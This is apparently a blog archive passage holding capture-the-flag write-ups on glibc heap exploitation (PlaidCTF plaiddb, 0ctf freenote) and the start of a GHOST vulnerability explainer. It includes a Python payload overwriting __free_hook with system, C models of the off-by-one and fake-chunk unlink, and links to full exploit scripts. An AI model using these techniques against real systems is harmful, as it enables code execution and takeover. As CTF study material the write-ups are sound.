<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjovx63sxRhwM3XovboZB53sfmc0rL3rEQ65MpV_1ejbFLMKXtK6_uLkR7at8EuDoBUyvT9swo2U1BELphGHCiiocwcSAHL5WolRs7UrsNE3aZf1LKgucL2u_PTWFMRsvQ8THDk8YiKpmk/s1600/pctf6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjovx63sxRhwM3XovboZB53sfmc0rL3rEQ65MpV_1ejbFLMKXtK6_uLkR7at8EuDoBUyvT9swo2U1BELphGHCiiocwcSAHL5WolRs7UrsNE3aZf1LKgucL2u_PTWFMRsvQ8THDk8YiKpmk/s400/pctf6.png" width="400" height="300" /></a></div>
<ul>
<li><code>free(D)</code>: D goes into the unsorted bin</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHBg2-bxKAZq7UPIJQs1lWXlA6yvJLMyAxYQBG-CqudGim8Nrf1dW8w_BaFNeJRezN5gHtDhf9qTnbwr2HHkvczyBmtlP9iKFngVZGHy9MXueMYf0mhnzOkopDjtMEUIvfgRw3P4IF3G0/s1600/pctf7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHBg2-bxKAZq7UPIJQs1lWXlA6yvJLMyAxYQBG-CqudGim8Nrf1dW8w_BaFNeJRezN5gHtDhf9qTnbwr2HHkvczyBmtlP9iKFngVZGHy9MXueMYf0mhnzOkopDjtMEUIvfgRw3P4IF3G0/s400/pctf7.png" width="400" height="300" /></a></div>
<ul>
<li><code>free(C)</code>: free() uses C's <code>prev_size</code> to locate the previous chunk, so it treats everything from the start of D up to C as a single free chunk of 0x120 bytes, unaware that E, still allocated, sits in the middle, and consolidates the whole region into one 0x220-byte chunk</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYkuRQQFlxm_DAiluVG1o7Y7SrbCm6rkmM0Gozvhvo8mS7cdJU3muwDtcvbgSp1OI6IZrt_QgHh_5HzVF-Y3D5U8HiZGYE7nXadXWGrnq_1ieqX4SY6ia84dKO_uJRsiiuu_nhXPYKLHY/s1600/pctf8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYkuRQQFlxm_DAiluVG1o7Y7SrbCm6rkmM0Gozvhvo8mS7cdJU3muwDtcvbgSp1OI6IZrt_QgHh_5HzVF-Y3D5U8HiZGYE7nXadXWGrnq_1ieqX4SY6ia84dKO_uJRsiiuu_nhXPYKLHY/s400/pctf8.png" width="400" height="300" /></a></div>
<ul>
<li><code>malloc(0x200)</code>: a large enough allocation now returns a chunk that also covers the still-allocated E, so E's contents can be rewritten at will. In this challenge the plaiddb <code>row struct</code> is what lands in E</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4_xp6A_Rt3syEhiANoaCltSnEyxm5qGTGhNbTRWQ4VKRJIOldAsqW8mQpaqJE3kNCyiB4Dxi8KZDRJ5BfjzcfMvbXF06OqyXq23CVydshC_qBgEqTx1oppiLeplFLXyCrk9s37BMPuIE/s1600/pctf9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4_xp6A_Rt3syEhiANoaCltSnEyxm5qGTGhNbTRWQ4VKRJIOldAsqW8mQpaqJE3kNCyiB4Dxi8KZDRJ5BfjzcfMvbXF06OqyXq23CVydshC_qBgEqTx1oppiLeplFLXyCrk9s37BMPuIE/s400/pctf9.png" width="400" height="300" /></a></div>
<li><p>Once the old <code>row struct</code> can be overwritten this way, the hard part is done. By tuning the sizes so that an old key also falls inside the overlapping chunk, and freeing it at the right moment, free() writes a bin address into the old key, and <code>DUMP</code> then leaks it, which gives the libc base. The old row is then shaped like this:</p></li>
</ul>
<pre><code class="language-python">from struct import pack

def pack64(v):
    return pack('&lt;Q', v)   # one little-endian 8-byte field

# Fake row written over the old row struct (0x38 bytes = 7 fields). binsh,
# free_hook and system are the addresses computed from the libc leak above.
payload  = pack64(binsh)           # pointer to the "/bin/sh" string ...
payload += pack64(7)               # ... and its length
payload += pack64(0)
payload += pack64(free_hook)       # node pointers around __free_hook: the tree
payload += pack64(free_hook-0x30)  # deletion in DEL writes through them ...
payload += pack64(free_hook)
payload += pack64(system)          # ... leaving system() in __free_hook
</code></pre>
<ul>
<li>Then, on <code>DEL</code>, the node-deletion code writes system into <code>__free_hook</code>, so the next free() is effectively a call to system(); in fact the shell pops as <code>DEL</code> is finishing. A short trace, or simply thinking through how a binary tree deletes a node, shows how those writes land, so I won't spell out the details</li>
</ul>
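<p>To make the off-by-one concrete, here is an added C model, not code from the challenge or from the write-up. It reconstructs the key-reading pattern described above as <code>getkey_vuln</code> beside a hardened <code>getkey_fixed</code>, lays out chunks A, B and C with the sizes used above in a constructed heap image, and shows that the single terminating NUL from A turns B's size 0x120 into 0x100 while C's <code>prev_size</code> still says 0x120. It also models the check glibc added in 2.29 (<code>corrupted size vs. prev_size while consolidating</code>), which is exactly what makes this trick fail on current glibc; the write-up's target predates it. The offsets, function names and the input key are assumptions of the example.</p>

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Model of a 64-bit glibc malloc_chunk header: prev_size at +0, size at +8.
 * The low three bits of size are flags; bit 0 is PREV_INUSE. */
#define PREV_INUSE ((uint64_t)0x1)
#define SIZE_MASK  (~(uint64_t)0x7)

static uint64_t rd64(const uint8_t *p) { uint64_t v; memcpy(&v, p, 8); return v; }
static void     wr64(uint8_t *p, uint64_t v) { memcpy(p, &v, 8); }

static uint64_t chunk_size(const uint8_t *chunk)      { return rd64(chunk + 8) & SIZE_MASK; }
static uint64_t chunk_prev_size(const uint8_t *chunk) { return rd64(chunk); }

typedef size_t (*key_reader)(char *, size_t, const char *);

/* Vulnerable key reader (reconstruction of the pattern described above):
 * copy up to cap bytes, then always write the terminator. A key of exactly
 * cap bytes puts '\0' at buf[cap], one byte past the allocation. */
static size_t getkey_vuln(char *buf, size_t cap, const char *src)
{
    size_t len = 0;
    while (len < cap && src[len] != '\0' && src[len] != '\n') {
        buf[len] = src[len];
        len++;
    }
    buf[len] = '\0';                 /* off-by-one when len == cap */
    return len;
}

/* Hardened reader: one byte of cap is reserved for the terminator. */
static size_t getkey_fixed(char *buf, size_t cap, const char *src)
{
    size_t len = 0;
    while (len + 1 < cap && src[len] != '\0' && src[len] != '\n') {
        buf[len] = src[len];
        len++;
    }
    buf[len] = '\0';                 /* always inside [buf, buf + cap) */
    return len;
}

/* Constructed heap image mirroring the steps above: A (0x110, in use) holds
 * the key, B (0x120) has just been freed, C (0x100) follows B. glibc lets A's
 * user data run over B's prev_size field, so a 0x108-byte request gets a
 * buffer that ends exactly at the low byte of B's size field. */
enum { A_OFF = 0x000, B_OFF = 0x110, C_OFF = 0x230, HEAP_LEN = 0x400 };
enum { A_USER_OFF = A_OFF + 0x10, A_USABLE = 0x108 };

static void lay_out_heap(uint8_t *heap)
{
    memset(heap, 0, HEAP_LEN);
    wr64(heap + A_OFF + 8, 0x110 | PREV_INUSE); /* A in use */
    wr64(heap + B_OFF + 8, 0x120 | PREV_INUSE); /* B free; A before it is in use */
    wr64(heap + C_OFF,     0x120);              /* C.prev_size records B's real size */
    wr64(heap + C_OFF + 8, 0x100);              /* C in use; PREV_INUSE clear since B is free */
}

/* The check _int_free() performs since glibc 2.29 before consolidating
 * backwards: walk prev_size back from the chunk being freed and require the
 * chunk found there to record that same size. The write-up's target lacks it. */
static int backward_consolidation_consistent(const uint8_t *heap, size_t freed_off)
{
    uint64_t prevsize = chunk_prev_size(heap + freed_off);
    return chunk_size(heap + freed_off - prevsize) == prevsize;
}

/* Feed a key that exactly fills A through the given reader. */
static void run_key(uint8_t *heap, key_reader reader)
{
    char key[A_USABLE + 1];
    lay_out_heap(heap);
    memset(key, 'k', A_USABLE);      /* constructed input: 0x108 non-NUL bytes */
    key[A_USABLE] = '\0';
    reader((char *)heap + A_USER_OFF, A_USABLE, key);
}

/* Size glibc would read for B after the key has been stored in A. */
static uint64_t b_size_after_key(key_reader reader)
{
    static uint8_t heap[HEAP_LEN];
    run_key(heap, reader);
    return chunk_size(heap + B_OFF);
}

/* Whether free(C) would still find B consistent with C.prev_size. */
static int free_c_consistent_after_key(key_reader reader)
{
    static uint8_t heap[HEAP_LEN];
    run_key(heap, reader);
    return backward_consolidation_consistent(heap, C_OFF);
}

int main(void)
{
    printf("vulnerable reader: B size 0x%llx, free(C) consistency check: %d\n",
           (unsigned long long)b_size_after_key(getkey_vuln), free_c_consistent_after_key(getkey_vuln));
    printf("fixed reader:      B size 0x%llx, free(C) consistency check: %d\n",
           (unsigned long long)b_size_after_key(getkey_fixed), free_c_consistent_after_key(getkey_fixed));
    return 0;
}
```

<p>With the vulnerable reader B reads as 0x100 and the 2.29 check fails (glibc would abort instead of consolidating); with the fixed reader B stays 0x120 and the check passes. In the real program the byte that gets cleared belongs to whichever chunk follows the key buffer, so the heap grooming is about arranging for that chunk to be B.</p>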
<h3 id="toc_5">Thoughts</h3>
<ul>
<li>Sadly I did not finish within the two days. The heap was almost fully groomed at the end, but I ran out of time; I am still too slow at writing exploits. The key to this challenge is the heap grooming: fastbin chunks never trigger unlink, so the situation described above is hard to reach with them, and you have to use the keys to produce smallbin-sized chunks. I won't describe the grooming in detail; if you have time, solve it yourself and enjoy the process :-)</li>
</ul>
<h3 id="toc_6">Exploit</h3>
<p><a href="https://github.com/scwuaptx/CTF/blob/master/pctf/plaiddb.py">exploit</a></p>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-36388043834692614242015-04-02T21:08:00.000-07:002016-10-10T21:16:36.329-07:000ctf 2015 Write-up <style type="text/css">
</style>
</head>
<body>
<h3 id="toc_0">程式概述</h3>
<ul>
<li>freenote is a simple note-taking program with four main functions, List, New, Edit and Delete, plus Exit to quit</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYjij0tM1PgM79t3mhlUFg4LmRzTSeRKVnnp0qM8T-9PQ3PjgqmRIEkkXGkGjVVwGXEYEKrFzsh6YWPeR1-5dP3KW0KloMRTpcRYZnrAerNwvzUgG8uL5QmvU4yzLnfHfJOVLkwvBTbYg/s1600/0ctf1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYjij0tM1PgM79t3mhlUFg4LmRzTSeRKVnnp0qM8T-9PQ3PjgqmRIEkkXGkGjVVwGXEYEKrFzsh6YWPeR1-5dP3KW0KloMRTpcRYZnrAerNwvzUgG8uL5QmvU4yzLnfHfJOVLkwvBTbYg/s320/0ctf1.png" width="320" height="148" /></a></div>
<ul>
<li>A note struct records, for each note, <code>whether it is valid</code>, <code>its length</code> and <code>a pointer to its content</code></li>
</ul>
<pre><code class="language-c">struct note {
    int   isValidNote;  /* 0 = not valid, 1 = valid */
    int   length;       /* note length */
    char *content;      /* pointer to the note body on the heap */
};
</code></pre>
<h3 id="toc_1">Program behaviour</h3>
<ul>
<li><p>ltrace shows that the program first calls malloc(0x1810) to hold the note structs as an array, indexed by note number, with the total number of notes stored at the front</p>
<ul>
<li>List
<ul>
<li>Lists each note's content (whatever the content pointer points to); only notes with <code>isValidNote == 1</code> are shown</li>
</ul></li>
<li>New
<ul>
<li>After you enter the size, anything up to 128 bytes gets a 128-byte allocation; above 128 bytes, say 252, you get 128 + 128 bytes, and so on (rounded up to a multiple of 128)</li>
</ul></li>
<li>Edit
<ul>
<li>After you pick the note and enter a size, the program checks whether the size equals the old one; if so it edits in place without reallocating, otherwise it reallocs to the new size. realloc first checks whether there is enough free space directly after the existing chunk, and if so the start address does not change</li>
</ul></li>
<li>Delete
<ul>
<li>After you pick the note to delete, it sets <code>isValidNote</code> in note[i] to 0, calls <code>free(note[i]->content)</code>, and <code>decrements the note count</code></li>
</ul></li>
</ul></li>
</ul>
<h3 id="toc_2">Vulnerabilities</h3>
<ul>
<li><p>Double free</p>
<ul>
<li>Delete does not remove the entry from <code>note[i]</code>; it only sets <code>isValidNote = 0</code>. The free is driven by <code>note[i]</code> without checking whether <code>note[i]->content</code> has already been freed, so entering the same <code>i</code> twice is a double free</li>
</ul></li>
<li><p>Memory leak</p>
<ul>
<li>The program does not append a <code>\0</code> after the user's input. After <code>free(note[i]->content)</code> the chunk joins a <code>free chunk</code> list and acquires <code>fd</code> and <code>bk</code> fields that point into the heap. If <code>note[i-1]</code> is enlarged with <code>edit</code> so that its content runs right up to the <code>fd</code> or <code>bk</code>, List prints them along with the note and leaks the address of the previously freed chunk. These offsets are fixed, so the <code>heap base</code> follows</li>
</ul></li>
</ul>
<h3 id="toc_3">Exploitation</h3>
<ul>
<li>To turn the double free into a write to other locations, <code>unlink()</code> has to be triggered, which requires one of the following situations:
<ul>
<li>The next chunk is the top chunk and the previous chunk is free
<ul>
<li>the freed chunk ends up consolidated into the top chunk</li>
</ul></li>
<li>The next chunk is not the top chunk, and either
<ul>
<li>the previous chunk is free, or</li>
<li>the next chunk is free</li>
</ul></li>
</ul></li>
<li>Whether the previous chunk is free, and its size (which free uses to locate the previous chunk), is recorded in the metadata of the current chunk; in other words, whether a given chunk counts as free is decided by the chunk after it. So to use the <code>next chunk is free</code> condition you would have to modify the metadata of the chunk after next, or somehow fool free() about where that chunk is, i.e. touch the metadata of three chunks. That is more trouble, so I went with the <code>previous chunk is free</code> condition.</li>
<li>Leaking the heap
<ul>
<li>Create about four notes, <code>delete notes 0 and 2</code>, then apply the method above to compute the heap address</li>
</ul></li>
<li><p>Building the fake chunk</p>
<ul>
<li>First new three notes, delete the second, then enlarge the first with edit so that it overwrites the second's <code>meta data</code>. My first attempt looked roughly like this</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi04wDhyphenhyphenCUE37UWZRgwx60MLjOjEJkkT3d0oJaXXNINAPn41Bmh3EQ0MWUWO06fA2gXm4zpu2iPzzc3Y9jidsLyqTdvEXcd3YI3XPuMd2ZJ7FrjEnNFWnUTpUIf9bjnBEg15Wjs3RFQgwg/s1600/0ctf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi04wDhyphenhyphenCUE37UWZRgwx60MLjOjEJkkT3d0oJaXXNINAPn41Bmh3EQ0MWUWO06fA2gXm4zpu2iPzzc3Y9jidsLyqTdvEXcd3YI3XPuMd2ZJ7FrjEnNFWnUTpUIf9bjnBEg15Wjs3RFQgwg/s320/0ctf2.png" width="320" height="237" /></a></div>
<ul>
<li>But running it kept aborting with <code>corrupted double-linked list</code></li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU8ozRq02E_ab4Vi1AWTI90iS6fRkgdtls7WNriDSQHBCbCJp5Yc-LOGNW7RmVQF_HAKJlNle9b09zm3sWRy68Cv8oCnkHM8q6LXWQi9XOsJ_u0qXGadT6oYULtueZSxRlIE3gRcm9Wfg/s1600/0ctf3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU8ozRq02E_ab4Vi1AWTI90iS6fRkgdtls7WNriDSQHBCbCJp5Yc-LOGNW7RmVQF_HAKJlNle9b09zm3sWRy68Cv8oCnkHM8q6LXWQi9XOsJ_u0qXGadT6oYULtueZSxRlIE3gRcm9Wfg/s320/0ctf3.png" width="320" height="23" /></a></div>
<ul>
<li>Looking closer, there is a <code>FD->bk != P || BK->fd != P</code> check, so the pointers cannot simply be overwritten: you need a P whose <code>P->fd->bk == P</code> and <code>P->bk->fd == P</code> for the unlink to go through</li>
<li><p>It took me a long time to realise that every note[i] holds a pointer to its content; with a small modification you can fake a chunk of a different size so that free() takes the address in <code>note[i]->content</code> for a chunk header. This was the key step, and the one I was stuck on longest. The final layout is shown below (yellow box = fake chunk):</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieghh0W2BUthlKrd_uglBR-bDfg4gCUtja802GVNNL0z6xH7We44S1NcKUOXj4DAT6qSmddqHl_7MyD6EoCaRmXBN_Vl8ubKAR83S4nm3s-1kRjcttk1wWZw6G5hHifnIC5oNLdQswrvU/s1600/0ctf4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieghh0W2BUthlKrd_uglBR-bDfg4gCUtja802GVNNL0z6xH7We44S1NcKUOXj4DAT6qSmddqHl_7MyD6EoCaRmXBN_Vl8ubKAR83S4nm3s-1kRjcttk1wWZw6G5hHifnIC5oNLdQswrvU/s320/0ctf4.png" width="320" height="236" /></a></div></li>
<li><p>After <code>delete note[1]</code>, i.e. free(note[1]->content), <code>note[0]</code> is successfully modified so that</p>
<ul>
<li><code>note[0]->content = &(note[0]->content)-0x10</code>, from FD->bk = BK</li>
<li><code>note[0]->content = &(note[0]->content)-0x18</code>, from BK->fd = FD</li>
</ul></li>
<li><p>So note[0]->content ends up as <code>&(note[0]->content)-0x18</code>, and edit can now rewrite the <code>note[i]</code> entries at will</p></li>
</ul></li>
<li><p>Rewriting note[i]</p>
<ul>
<li><p>I changed the setup slightly and used six notes</p>
<ul>
<li>Notes 0-1 are used to leak the heap address</li>
<li>Notes 2-3 are used to rewrite the contents of <code>note[i]</code></li>
<li>With that done, one more edit with the same size as before overwrites the whole note table. The size must match the one given at new time, otherwise a realloc happens and the step fails. Roughly:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqDlwCyrls_JWYpoJOUbZGugr8ZrcIvEiQRct4wLapSERjP1Xz6fRPrQVBWsdUhY8d7IOiGxUmzqNTsFiJWGdZ89CNBWjgPA4dL34Lnz3FclrL-Pn7D04619jBwjmRSVzNVKVefjy1_iM/s1600/0ctf6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqDlwCyrls_JWYpoJOUbZGugr8ZrcIvEiQRct4wLapSERjP1Xz6fRPrQVBWsdUhY8d7IOiGxUmzqNTsFiJWGdZ89CNBWjgPA4dL34Lnz3FclrL-Pn7D04619jBwjmRSVzNVKVefjy1_iM/s320/0ctf6.png" width="320" height="260" /></a></div>
<ul>
<li>Notes 4-5 are used at the end to overwrite atoi's GOT entry
<ul>
<li>It does not actually take this many notes, but I kept each step separate to avoid confusing myself</li>
</ul></li>
</ul></li>
<li><p>Next, rewrite part of <code>note[i]</code> so that content pointers point at <code>free_got</code> and <code>atoi_got</code></p></li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqDlwCyrls_JWYpoJOUbZGugr8ZrcIvEiQRct4wLapSERjP1Xz6fRPrQVBWsdUhY8d7IOiGxUmzqNTsFiJWGdZ89CNBWjgPA4dL34Lnz3FclrL-Pn7D04619jBwjmRSVzNVKVefjy1_iM/s1600/0ctf6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqDlwCyrls_JWYpoJOUbZGugr8ZrcIvEiQRct4wLapSERjP1Xz6fRPrQVBWsdUhY8d7IOiGxUmzqNTsFiJWGdZ89CNBWjgPA4dL34Lnz3FclrL-Pn7D04619jBwjmRSVzNVKVefjy1_iM/s320/0ctf6.png" width="320" height="260" /></a></div>
<ul>
<li>After list, the GOT entries give the libc base</li>
</ul></li>
<li><p>Overwriting the GOT</p>
<ul>
<li>Another edit of <code>note[5]</code> writes <code>system</code> over atoi's GOT entry</li>
</ul></li>
<li><p>Jumping to system</p>
<ul>
<li>Typing <code>/bin/sh</code> at the menu prompt now runs <code>system('/bin/sh')</code>, and that gives a shell</li>
</ul></li>
<li><p>exploit
<a href="https://github.com/scwuaptx/CTF/blob/master/0ctf/freenote.py">exploit</a></p></li>
</ul>
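<p>The fake-chunk trick above, as an added C model that is neither freenote's code nor the author's exploit: <code>model_unlink</code> reproduces the glibc unlink check <code>FD->bk != P || BK->fd != P</code> and its two pointer writes over a constructed note table, <code>build_fake_chunk</code> points fd and bk just before the slot that stores <code>note[i]->content</code>, and <code>build_naive_chunk</code> is the first attempt that the check rejects. The table layout (count followed by the array) and the use of note 2 follow the description above; the buffer sizes and the 0x80 fake size are assumptions.</p>

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* 64-bit malloc_chunk layout: prev_size +0, size +8, fd +0x10, bk +0x18. */
#define FD_OFF 0x10
#define BK_OFF 0x18

struct note {
    int   isValidNote;
    int   length;
    char *content;
};

/* The note table as freenote keeps it: a count followed by the note array.
 * A constructed, smaller table stands in for the real malloc(0x1810) block. */
struct note_table {
    uint64_t    count;
    struct note notes[8];
};

static void *rdptr(const uint8_t *p) { void *v; memcpy(&v, p, sizeof v); return v; }
static void  wrptr(uint8_t *p, const void *v) { memcpy(p, &v, sizeof v); }

/* Model of glibc's unlink macro: the "corrupted double-linked list" check
 * (FD->bk != P || BK->fd != P), then the two pointer writes. Returns 0 when
 * the unlink goes through, -1 when glibc would abort. */
static int model_unlink(uint8_t *P)
{
    uint8_t *FD = rdptr(P + FD_OFF);
    uint8_t *BK = rdptr(P + BK_OFF);
    if (rdptr(FD + BK_OFF) != P || rdptr(BK + FD_OFF) != P)
        return -1;
    wrptr(FD + BK_OFF, BK);          /* FD->bk = BK */
    wrptr(BK + FD_OFF, FD);          /* BK->fd = FD */
    return 0;
}

/* Fake chunk at the start of the note's content, so that free() treats
 * note->content itself as a chunk header. fd and bk point just before the
 * slot holding the content pointer; FD->bk and BK->fd therefore both read
 * back as P and the check passes. */
static void build_fake_chunk(struct note *n, uint64_t fake_size)
{
    uint8_t *P    = (uint8_t *)n->content;
    uint8_t *slot = (uint8_t *)&n->content;
    memset(P, 0, 0x20);
    memcpy(P + 8, &fake_size, sizeof fake_size);   /* size field, PREV_INUSE clear */
    wrptr(P + FD_OFF, slot - BK_OFF);              /* (fd + 0x18) == &n->content */
    wrptr(P + BK_OFF, slot - FD_OFF);              /* (bk + 0x10) == &n->content */
}

/* The naive first attempt from the write-up: fd/bk pointing at some other
 * heap memory, which the check rejects. */
static void build_naive_chunk(struct note *n, uint64_t fake_size)
{
    uint8_t *P = (uint8_t *)n->content;
    memset(P, 0, 0x60);
    memcpy(P + 8, &fake_size, sizeof fake_size);
    wrptr(P + FD_OFF, P + 0x40);
    wrptr(P + BK_OFF, P + 0x40);
}

/* Run the unlink on note idx of a constructed table. On success, return how
 * many bytes the content pointer now sits before its own slot in the table;
 * return -1 when the unlink is rejected. */
static ptrdiff_t unlink_displacement(int idx, void (*build)(struct note *, uint64_t))
{
    static struct note_table t;
    static uint8_t content[0x100];
    memset(&t, 0, sizeof t);
    memset(content, 0, sizeof content);
    t.count = 6;
    t.notes[idx].isValidNote = 1;
    t.notes[idx].length = 0x80;
    t.notes[idx].content = (char *)content;
    build(&t.notes[idx], 0x80);
    if (model_unlink(content) != 0)
        return -1;
    return (uint8_t *)&t.notes[idx].content - (uint8_t *)t.notes[idx].content;
}

int main(void)
{
    printf("fake chunk anchored on the pointer slot: displacement %td bytes\n",
           unlink_displacement(2, build_fake_chunk));
    printf("naive fake chunk: %td (rejected by the check)\n",
           unlink_displacement(2, build_naive_chunk));
    return 0;
}
```

<p>After the successful unlink, note 2's content pointer points 0x18 bytes before its own slot, i.e. into the note table, so an edit of the same size now rewrites the table entries; that is how the later notes get redirected at the GOT. In the real exploit glibc performs the unlink when free(note[1]->content) finds PREV_INUSE clear and walks prev_size back to the fake chunk. Since glibc 2.26 unlink additionally requires chunksize(P) == prev_size(next_chunk(P)), so on newer targets the fake size must also agree with the prev_size field of the chunk that follows it.</p>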
<h3 id="toc_4">Thoughts</h3>
<ul>
<li>This 0ctf was not very hard, but for some reason I ran out of steam on the second day and solved only freenote in two whole days. I thought the challenges were well made and fun; my skill and experience still need work, and I need to practise other categories too, since I can barely solve anything outside pwn, even a basic SQL injection gives me trouble. freenote is a great challenge for practising heap exploitation, and when I have time I will write up some heap exploitation material.</li>
</ul>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-83987973294466295142015-01-28T20:58:00.000-08:002016-10-10T20:59:14.586-07:00GHOST : The Vulnerability of Glibc <style type="text/css">
</style>
</head>
<body>
<h1 id="toc_0">Introduction</h1>
<p>I came across a vulnerability called GHOST <a href="https://threatpost.com/ghost-glibc-remote-code-execution-vulnerability-affects-all-linux-systems/110679">online</a> and put together these notes to help my own understanding. The background section lists what you may need to know to follow the description of the bug; there is plenty of material online, so I only link a few references and won't go into them here.</p>
<h1 id="toc_1">Background</h1>
<ul>
<li>vulnerability
<ul>
<li><a href="http://www.csie.ncu.edu.tw/%7Ehsufh/COURSES/FALL2016/2_BOA.ppt">Buffer overflow</a></li>
<li><a href="https://hwchen18546.wordpress.com/2014/05/05/software-heap-overflow/">Heap overflow</a></li>
</ul></li>
<li>protection
<ul>
<li><a href="http://www.csie.ncu.edu.tw/%7Ehsufh/COURSES/FALL2016/2_BOA.ppt">NX (DEP)</a></li>
<li><a href="http://www.csie.ncu.edu.tw/%7Ehsufh/COURSES/FALL2014/2_BOA.ppt">ASLR (Address space layout randomization)</a></li>
<li><a href="http://www.csie.ncu.edu.tw/%7Ehsufh/COURSES/FALL2016/2_BOA.ppt">Stack Guard</a></li>
</ul></li>
<li><a href="http://zh.wikipedia.org/wiki/GNU_C%E5%87%BD%E5%BC%8F%E5%BA%AB">glibc</a></li>
</ul>
<h1 id="toc_2">Affected versions</h1>
<ul>
<li>glibc 2.2 - 2.17 (fixed in glibc 2.18)</li>
</ul>
<h1 id="toc_3">Overview</h1>
<p>In short, glibc's <a href="http://osxr.org/glibc/source/nss/digits_dots.c?v=glibc-2.17#0036"><code>__nss_hostname_digits_dots()</code></a> contains a buffer overflow. It is called by the <a href="http://osxr.org/glibc/source/nss/getXXbyYY.c?v=glibc-2.17#0087"><code>gethostbyname*()</code></a> family of functions, which convert between hostnames and IP addresses, i.e. perform DNS queries. What if the hostname passed in is already an IP address? For that case glibc added a check in <code>__nss_hostname_digits_dots()</code>: if the name looks like an IP address, the DNS lookup is skipped. That path is where the overflow lives, but the payload has to satisfy the following conditions:</p>
<ul>
<li>The first character must be a digit</li>
<li>The last character must not be a dot (.)</li>
<li>It must consist only of digits and dots</li>
<li>It must be long enough to overflow the buffer</li>
<li>In addition, the copy is only reached after inet_aton() (or inet_pton() for IPv6) has accepted the string as an address; a long run of <code>0</code> characters satisfies all of the above</li>
</ul>
<p>If arbitrary <a href="http://en.wikipedia.org/wiki/Shellcode">shellcode</a> cannot be injected, why is this still so dangerous? You first need to know what a free chunk is. Briefly, it is part of how glibc's malloc manages memory: free memory is divided into chunks that are kept on <strong>linked lists</strong>, and a malloc takes a chunk off one of those lists, mainly to avoid fragmenting the address space. The bookkeeping lives in the header at the front of each chunk, which records the chunk's size and whether the chunk before it is in use, among other things. See <a href="http://itlab.idcquan.com/linux/administer/964071.html">this article</a> for more detail, or search for it yourself.</p>
<p>Back to the point: why is this so dangerous? Because with the overflow an attacker can alter the <code>header of a neighbouring free chunk</code> on the heap and enlarge that <strong>free chunk</strong>. If memory the program is still using follows it, the next allocation served from that chunk lets the attacker overwrite the program's data at will; it can also be turned into a memory leak, and protections such as ASLR and NX can be bypassed.</p>
<h1 id="toc_4">Details</h1>
<p>The vulnerable function is <a href="http://osxr.org/glibc/source/nss/digits_dots.c?v=glibc-2.17#0036"><code>__nss_hostname_digits_dots()</code></a>, which is used when the <strong>hostname</strong> is an <strong>IP</strong> address. In its code,</p>
<pre><code class="language-c">85 size_needed = (sizeof (*host_addr)
86 + sizeof (*h_addr_ptrs) + strlen (name) + 1);
</code></pre>
<p><code>size_needed</code> first computes the space required for <code>host_addr</code>, <code>h_addr_ptrs</code> and <code>name (the hostname)</code>. The code that follows checks whether the pre-allocated buffer is big enough and allocates a bigger one if it is not, in two cases, <a href="http://zh.wikipedia.org/wiki/%E5%8F%AF%E9%87%8D%E5%85%A5">reentrant</a> and <a href="http://zh.wikipedia.org/wiki/%E5%8F%AF%E9%87%8D%E5%85%A5">non-reentrant</a>. Briefly, reentrant code can safely be executed again while a previous execution is still in progress: recursive code that only uses local variables is fine, whereas code that relies on static variables in a multithreaded program can run into a <a href="http://en.wikipedia.org/wiki/Race_condition">race condition</a>. I won't go further into that here.</p>
<p>reentrant </p>
<pre><code class="language-c"> 88 if (buffer_size == NULL)
89 {
90 if (buflen < size_needed)
91 {
92 if (h_errnop != NULL)
93 *h_errnop = TRY_AGAIN;
94 __set_errno (ERANGE);
95 goto done;
96 }
97 }
</code></pre>
<p>non-reentrant</p>
<pre><code class="language-c"> 98 else if (buffer_size != NULL && *buffer_size < size_needed)
99 {
